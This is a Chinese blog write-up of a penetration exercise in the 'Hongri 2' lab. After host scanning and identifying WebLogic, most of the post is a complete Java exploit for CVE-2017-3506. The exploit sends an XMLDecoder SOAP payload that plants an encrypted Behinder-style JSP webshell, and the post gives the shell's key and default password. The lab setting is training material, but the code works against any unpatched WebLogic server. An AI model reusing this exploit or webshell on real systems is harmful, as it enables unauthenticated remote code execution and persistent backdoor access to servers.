首页 > 其他分享 >红日二

红日二

时间:2023-01-08 18:22:05浏览次数:38  
标签:红日 String wls 192.168 import conn out

信息搜集

存活主机探测nmap -sS -T4 192.168.2.1/24

image-20221128151556484

确定边缘机192.168.2.247

image-20221128151910562

192.168.2.165

image-20221128151921959

确定原因:

  1. 开启web服务
  2. 开启3389远程桌面服务

192.168.2.247

80端口为IIS服务,未发现利用点

image-20221128152932884

7001端口也为web服务,目录扫描

image-20221128153229803

访问/console路由,得知为Weblogic中间件

image-20221128153315896

使用Weblogic检测工具检测

image-20221128154340592

使用CVE-2017-3506工具直接写入webshell

image-20221128154918784

但该漏洞写入的马发现只能执行whoami,使用CVE-2019-2725来打

image-20221128155617699

成功获得webshell,但是这些shell都无法使用工具去连接

这里向通过rce进行下载远程木马并远程上线,无果

难受,只好看漏洞原理修改工具的木马为rebeyond木马,如下使用CVE-2017-3506进行攻击写入冰蝎马

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.URL;
import java.net.URLConnection;

public class Shell {
    public static String writeShell(String host, String wls_Wsat_Path, String shellName) {
        String shellPath = "servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/" + shellName;
        String payload = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"><soapenv:Header><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><java version=\"1.4.0\" class=\"java.beans.XMLDecoder\"><object class=\"java.io.PrintWriter\"> <string>" + shellPath + "</string><void method=\"println\"><string><![CDATA[<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>]]></string></void><void method=\"close\"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>";
        PrintWriter out = null;
        BufferedReader in = null;
        String result = "";
        try {
            URL realUrl = new URL(String.valueOf(host) + wls_Wsat_Path);
            URLConnection conn = realUrl.openConnection();
            conn.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)");
            conn.setRequestProperty("Content-Type", "text/xml");
            conn.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8");
            conn.setDoOutput(true);
            conn.setDoInput(true);
            out = new PrintWriter(conn.getOutputStream());
            out.print(payload);
            out.flush();
            in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
            String line;
            while ((line = in.readLine()) != null)
                result = String.valueOf(result) + line;
        } catch (Exception e) {
            System.out.println("[+] Success\n[+] " + host + "/wls-wsat/" + shellName);
        } finally {
            try {
                if (out != null)
                    out.close();
                if (in != null)
                    in.close();
            } catch (IOException ex) {
                ex.printStackTrace();
            }
        }
        return result;
    }

    public static void main(String[] args) {
        String host = "http://192.168.2.247:7001";
        String wls_Wsat_Path = "/wls-wsat/CoordinatorPortType11";
        String shellName = "ggbond.jsp";
        Shell.writeShell(host, wls_Wsat_Path, shellName);
    }
}

成功连接

image-20221129173532754

注:192.168.2.159 192.168.2.161

标签:红日,String,wls,192.168,import,conn,out
From: https://www.cnblogs.com/seizer/p/17033834.html

相关文章